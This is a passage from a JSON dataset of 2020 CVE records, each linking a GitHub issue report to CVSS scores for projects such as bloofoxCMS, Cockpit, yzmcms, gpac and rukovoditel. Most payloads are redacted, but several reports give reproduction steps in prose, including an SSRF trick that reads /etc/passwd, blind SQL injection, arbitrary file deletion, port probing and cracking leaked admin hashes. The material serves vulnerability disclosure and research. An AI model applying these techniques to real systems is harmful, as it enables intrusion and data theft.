        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35761",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/8",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/8",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2020-12-27T09:44:47Z",
        "description": "Authenticated RXSS in 'fileurl' parameter. I found an Authenticated RXSS in 'fileurl' parameter, the 'fileurl' input was not safely sanitized. APITAG : FILETAG URLTAG APITAG Impact The attacker can execute a HTML/JS Code (the attacker can stealing cookies,etc..) Fix Use FILETAG function",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-35762",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/11",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/11",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2020-12-27T11:15:54Z",
        "description": "Authenticated Path traversal in 'fileurl' parameter that leads to read local files. I discovered a Path traversal Vulnerability in 'fileurl' parameter, the 'fileurl' input does not avoid (./\\) in user input which that leads to Path traversal Vulnerability. APITAG : FILETAG FILETAG Impact Read local files in webserver",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 2.7,
        "impactScore": 1.4,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-35766",
        "Issue_Url_old": "https://github.com/trusteddomainproject/OpenDKIM/issues/113",
        "Issue_Url_new": "https://github.com/trusteddomainproject/opendkim/issues/113",
        "Repo_new": "trusteddomainproject/opendkim",
        "Issue_Created_At": "2020-12-28T16:05:55Z",
        "description": "Insecure temporary key path /tmp/testkeys. In URLTAG a fixed path under APITAG is used for the test keys. This is not a _huge_ vulnerability, but it is a silly one since it is so well known and easy to avoid: URLTAG Either a random name should be chosen securely, or perhaps the temporary keys should be created within the build directory.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35850",
        "Issue_Url_old": "https://github.com/cockpit-project/cockpit/issues/15077",
        "Issue_Url_new": "https://github.com/cockpit-project/cockpit/issues/15077",
        "Repo_new": "cockpit-project/cockpit",
        "Issue_Created_At": "2020-12-28T16:28:11Z",
        "description": "unauthenticated server side request forgery . Cockpit version NUMBERTAG OS: Ubuntu NUMBERTAG Page: login User can detect open ssh port or another open ports on server that services Cockpit last version. This is a vulnerability that allows an user send request to internal hosts for detecting open ports. So that firewall configuration can be bypassed or the server can be used like gateway by malicious user. In addition, user induces the application to make an request back to the server that is hosting Cockpit. For example: if system admin creates iptables rule to drop all packets that come to NUMBERTAG port or another port, user can detect whether port NUMBERTAG is open or not. Assuming that there is a iptables rule which port NUMBERTAG is open for APITAG (loopback interface) but is closed for other interfaces CODETAG CODETAG Steps to reproduce: On login panel NUMBERTAG Click Other Options NUMBERTAG Set APITAG to Connect to field and send request with incorrect credentials NUMBERTAG Intercept the request with Burp Suite NUMBERTAG If ssh service is open on port NUMBERTAG and credentials are wrong, server returns NUMBERTAG Authentication Failed\" response NUMBERTAG If user tries connect to a port that accepts data for ssh connection , server returns NUMBERTAG Authentication failed: no host\" response and waits NUMBERTAG seconds NUMBERTAG If user tries connect to a closed port , server returns NUMBERTAG Authentication failed: no host\" response and without waiting NUMBERTAG If ssh service is open on port NUMBERTAG and credentials are correct, server returns NUMBERTAG response: FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35918",
        "Issue_Url_old": "https://github.com/tuupola/branca-spec/issues/22",
        "Issue_Url_new": "https://github.com/tuupola/branca-spec/issues/22",
        "Repo_new": "tuupola/branca-spec",
        "Issue_Created_At": "2020-04-06T21:18:10Z",
        "description": "Base NUMBERTAG is actually Base NUMBERTAG The character set provided in the spec: APITAG Only contains NUMBERTAG characters, and is thus a base NUMBERTAG encoding. Looking at the implementations listed on the document, it seems that most of them (if not all) include a z to the character set as I would expect. Is this the intended behaviour? Or should the character set not include the character z ?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35918",
        "Issue_Url_old": "https://github.com/return/branca/issues/24",
        "Issue_Url_new": "https://github.com/return/branca/issues/24",
        "Repo_new": "return/branca",
        "Issue_Created_At": "2020-11-29T14:04:47Z",
        "description": "Security issue: Panic on invalid base NUMBERTAG encoded tokens. Documentation for APITAG , which also implicitly covers APITAG , states that: > If the input is not in Base NUMBERTAG format, it returns a ERRORTAG Result. Prior to APITAG this was not the case, instead a panic would occur: URLTAG This could leave any validating instance vulnerable to potential APITAG when parsing untrusted data and unexpected panics could occur. This behavior was corrected in URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35930",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/201",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/201",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2020-12-30T10:49:42Z",
        "description": "FILETAG After fix i go to request CVE",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-35970",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/53",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/53",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-12-14T15:14:20Z",
        "description": "There are SSRF vulnerabilities in background collection management. Log in the background management and create a new node in the collection management FILETAG FILETAG Add our url with the attack code FILETAG FILETAG Then click collect FILETAG Because two methods are written in the source code If you have curl extensions, use curl_ Close function. If not, use file_ get_ Contents function FILETAG And when processing the URL, only the first four characters of the URL are obtained by using the substr function, and whether it is HTTP is judged. If it is, it is checked FILETAG Here, you can use the features of PHP. When PHP encounters an unknown protocol, it will throw a warning and set the protocol to null. When the Protoco is null or file, the local operation will be carried out. By default, the local file operation will be performed if the protocol is not transferred or the protocol does not exist. Therefore, we can use a custom protocol, such as httpxxx, which can start from HTTP, but can't be HTTPS. We can try to read the /etc/passwd file FILETAG Then click collect FILETAG The file was read successfully",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35971",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/54",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/54",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-12-30T09:52:17Z",
        "description": "APITAG NUMBERTAG SS bug. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG Description: In the FILETAG row NUMBERTAG No filtering of the searinfo APITAG xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-35972",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/55",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/55",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-12-30T12:40:28Z",
        "description": "There is a CSRF vulnerability to add users. After the administrator logged in, open the following the page POC: FILETAG APITAG FILETAG Refresh page after opening FILETAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35979",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1662",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1662",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-12-15T12:02:59Z",
        "description": "APITAG heap buffer overflow in gp_rtp_builder_do_avc APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35980",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1661",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1661",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-12-15T12:01:23Z",
        "description": "APITAG heap use after free in gf_isom_box_del APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG NUMBERTAG URLTAG and NUMBERTAG URLTAG . Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35981",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1659",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1659",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-12-15T11:57:41Z",
        "description": "A NULL pointer dereference in the function APITAG APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) I think it is probably due to an imcomplete fix of NUMBERTAG URLTAG Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35982",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1660",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1660",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-12-15T11:59:14Z",
        "description": "A NULL pointer dereference in the function gf_hinter_track_finalize in APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (latest master c4f8bc6e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG gdb info: CODETAG ASAN info: ERRORTAG Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu( EMAILTAG ) APITAG APITAG APITAG EMAILTAG ) and Yanhao.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35984",
        "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/4",
        "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/4",
        "Repo_new": "r0ck3t1973/rukovoditel",
        "Issue_Created_At": "2020-12-16T01:54:42Z",
        "description": "Store Cross Site Scripting Vulnerability on \"users_alerts\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"users_alerts\" feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'users_alerts NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-35985",
        "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/3",
        "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/3",
        "Repo_new": "r0ck3t1973/rukovoditel",
        "Issue_Created_At": "2020-12-16T01:51:19Z",
        "description": "Store Cross Site Scripting Vulnerability on \"global_lists\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"global_lists\" feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'global_lists NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-35986",
        "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/2",
        "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/2",
        "Repo_new": "r0ck3t1973/rukovoditel",
        "Issue_Created_At": "2020-12-16T01:46:27Z",
        "description": "Store Cross Site Scripting Vulnerability on \"users_groups\" in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new 'users_groups NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-35987",
        "Issue_Url_old": "https://github.com/r0ck3t1973/rukovoditel/issues/1",
        "Issue_Url_new": "https://github.com/r0ck3t1973/rukovoditel/issues/1",
        "Repo_new": "r0ck3t1973/rukovoditel",
        "Issue_Created_At": "2020-12-16T01:41:10Z",
        "description": "Cross Site Script Vulnerability on APITAG in rukovoditel NUMBERTAG APITAG the bug/ I download install rukoviditel NUMBERTAG An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce APITAG to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Add new APITAG NUMBERTAG Insert payload: \"> APITAG NUMBERTAG Save and BOOM!!!! Alert XSS Message APITAG behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page APITAG NUMBERTAG insert payload module 'entities' FILETAG NUMBERTAG BOOM!!! FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-36004",
        "Issue_Url_old": "https://github.com/source-trace/appcms/issues/2",
        "Issue_Url_new": "https://github.com/source-trace/appcms/issues/2",
        "Repo_new": "source-trace/appcms",
        "Issue_Created_At": "2020-12-18T06:13:11Z",
        "description": "SQL injection vulnerability exists in APITAG required). First, the loopholes should be reappeared, and then the reasons should be analyzed : After logging in the background ,We know that if we need to add an app, we need a key: FILETAG FILETAG So before testing, I need to create a new table in the database and add data . FILETAG The table name is \"app\"_ cms_list\" , It then contains two pieces of data, as shown in the figure. Next, we can visit this link to perform blind SQL injection in the \"now\":(\"dawn\" is the original \"admin\", but the system needs us to change the background name) URLTAG Pay attention to the use of \"+\" instead of \"space\", and unsuccessful words will lead to NUMBERTAG At the same time, remember to log in to the background. FILETAG FILETAG FILETAG Little surprise, we also found that its cookie did not change before and after login, but it was in the header, interesting. Next, we analyze the code : FILETAG We can control them APITAG go to \"get_ List\": Our \"$now\" was handed over to \"$params FILETAG FILETAG FILETAG In any case, our $where is not filtered and goes directly into the SQL statement : FILETAG We follow the \"query\": FILETAG FILETAG FILETAG nice!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36005",
        "Issue_Url_old": "https://github.com/source-trace/appcms/issues/3",
        "Issue_Url_new": "https://github.com/source-trace/appcms/issues/3",
        "Repo_new": "source-trace/appcms",
        "Issue_Created_At": "2020-12-18T06:18:00Z",
        "description": "I found out in FILETAG After logging in, allow me to delete any APITAG required). First, we find that there is a sensitive function for \"del_resource\" of FILETAG FILETAG We follow it to APITAG FILETAG FILETAG How do we call the \"m__del_resource\" function? FILETAG Good. I already know how to use it : Let's first create a test file FILETAG in the root directory: FILETAG Open burp and pay attention to the data of get and APITAG that you have to log in to the background first: URLTAG FILETAG Click send, it shows failed? FILETAG But when we look at the local files, APITAG has disappeared : FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-36006",
        "Issue_Url_old": "https://github.com/source-trace/appcms/issues/4",
        "Issue_Url_new": "https://github.com/source-trace/appcms/issues/4",
        "Repo_new": "source-trace/appcms",
        "Issue_Created_At": "2020-12-18T06:22:17Z",
        "description": "I found out in FILETAG After logging in, allow me to delete any APITAG required). In the same (issues NUMBERTAG we found another point : FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-36007",
        "Issue_Url_old": "https://github.com/source-trace/appcms/issues/7",
        "Issue_Url_new": "https://github.com/source-trace/appcms/issues/7",
        "Repo_new": "source-trace/appcms",
        "Issue_Created_At": "2020-12-18T06:30:01Z",
        "description": "I found Reflective XSS in APITAG required). Of course, we have to log in to the background first. Let's go look at the code, it's very easy : PATHTAG FILETAG payload: APITAG Of course, there are many files with the same problem. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36008",
        "Issue_Url_old": "https://github.com/SomeBottle/OBottle/issues/7",
        "Issue_Url_new": "https://github.com/somebottle/obottle/issues/7",
        "Repo_new": "somebottle/obottle",
        "Issue_Created_At": "2020-12-20T03:02:43Z",
        "description": "APITAG NUMBERTAG FILETAG has an arbitrary file write APITAG login\uff09. If you don't think it's important, you can ignore me. The trigger point is here: FILETAG FILETAG We want to enter here, first of all, there are several conditions: APITAG in FILETAG NUMBERTAG FILETAG We first visit the login interface to enter the background: FILETAG FILETAG Then we type payload in the title: APITAG FILETAG Then it will automatically jump to the published page: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-36009",
        "Issue_Url_old": "https://github.com/SomeBottle/OBottle/issues/6",
        "Issue_Url_new": "https://github.com/somebottle/obottle/issues/6",
        "Repo_new": "somebottle/obottle",
        "Issue_Created_At": "2020-12-20T02:59:07Z",
        "description": "\\c\\g.php has an arbitrary file download vulnerability. If you don't think it's important, you can ignore me. FILETAG As you can see, we need to go through two levels to get to the castle. These data are not filtered. FILETAG We need to bypass the logic here. What should we do? FILETAG APITAG POC: POST APITAG data: PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36051",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/39",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/39",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2020-12-23T06:13:59Z",
        "description": "There is two path traversal vulnerability. post_edit and FILETAG line NUMBERTAG index_file = PATHTAG line NUMBERTAG index_file = PATHTAG post_state is controllable and there is no filtering limit We can use ../ to loop through all files",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36056",
        "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/5",
        "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/5",
        "Repo_new": "vivekpanday12/cve-",
        "Issue_Created_At": "2022-01-23T15:03:12Z",
        "description": "CVETAG beetel Moderm NUMBERTAG r1 \u2014 Cross Site Scripting on the beetel NUMBERTAG r1 via the Ping Diagnostic. Exploit Title: beetel Moderm NUMBERTAG r1 \u2014 Cross Site Scripting on the beetel NUMBERTAG r1 via the Ping Diagnostic Date NUMBERTAG Exploit Author: VIVEK PANDAY Version: Firmware Version APITAG NUMBERTAG R1 Tested on Windows NUMBERTAG Linkedln Contact: URLTAG CVETAG APITAG site scripting] (XSS) Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk. APITAG To Reproduce NUMBERTAG Login to your router NUMBERTAG After signing NUMBERTAG Select for Maintance Mode NUMBERTAG Go to Ping Diagnostic option NUMBERTAG In the host Name field, enter any of these payloads: APITAG alert APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-36062",
        "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/3",
        "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/3",
        "Repo_new": "vivekpanday12/cve-",
        "Issue_Created_At": "2022-01-23T14:55:24Z",
        "description": "CVE NUMBERTAG Dairy Farm Shop Management System \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Dairy Farm Shop Management System \u00a0\u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Date NUMBERTAG Exploit Author: VIVEK PANDAY \u00a0 \u00a0 Vendor Homepage: FILETAG Software Link: URLTAG Version NUMBERTAG Tested on: Windows NUMBERTAG Linkedln Contact: URLTAG CVE NUMBERTAG Hardcoded Credentials:] Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from\u00a0 URLTAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper. APITAG use a strong encryption algorithm like SHA NUMBERTAG with APITAG use default credentials always change during installation time",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36064",
        "Issue_Url_old": "https://github.com/VivekPanday12/CVE-/issues/2",
        "Issue_Url_new": "https://github.com/vivekpanday12/cve-/issues/2",
        "Repo_new": "vivekpanday12/cve-",
        "Issue_Created_At": "2022-01-23T14:03:54Z",
        "description": "CVETAG Online Course Registration \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access. Exploit Title: Online Course Registration \u2014 Use of Hard coded Credentials in Source Code Leads to Admin Panel Access Date NUMBERTAG Exploit Author: VIVEK PANDAY \u00a0 Vendor Homepage: FILETAG Software Link: FILETAG Version NUMBERTAG Tested on Windows NUMBERTAG Linkedln Contact: URLTAG \u00a0 CVETAG Hardcoded Credentials: Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non encrypted) passwords and other secrets (SSH Keys, APITAG secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk. APITAG Vectors] An attacker can gain admin panel access using default credentials and do malicious activities Proof Of Concept NUMBERTAG Download source code from\u00a0 FILETAG NUMBERTAG Now unzip it and go to the Database folder here we can see one SQL file NUMBERTAG Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36066",
        "Issue_Url_old": "https://github.com/tidwall/gjson/issues/195",
        "Issue_Url_new": "https://github.com/tidwall/gjson/issues/195",
        "Repo_new": "tidwall/gjson",
        "Issue_Created_At": "2020-12-23T07:10:22Z",
        "description": "APITAG can cause APITAG attacks in specific input scenarios. The following POC can cause redos.. func APITAG { APITAG := APITAG APITAG APITAG }",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36067",
        "Issue_Url_old": "https://github.com/tidwall/gjson/issues/196",
        "Issue_Url_new": "https://github.com/tidwall/gjson/issues/196",
        "Repo_new": "tidwall/gjson",
        "Issue_Created_At": "2020-12-24T02:40:47Z",
        "description": "panic: runtime error: slice bounds out of range. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36079",
        "Issue_Url_old": "https://github.com/zenphoto/zenphoto/issues/1292",
        "Issue_Url_new": "https://github.com/zenphoto/zenphoto/issues/1292",
        "Repo_new": "zenphoto/zenphoto",
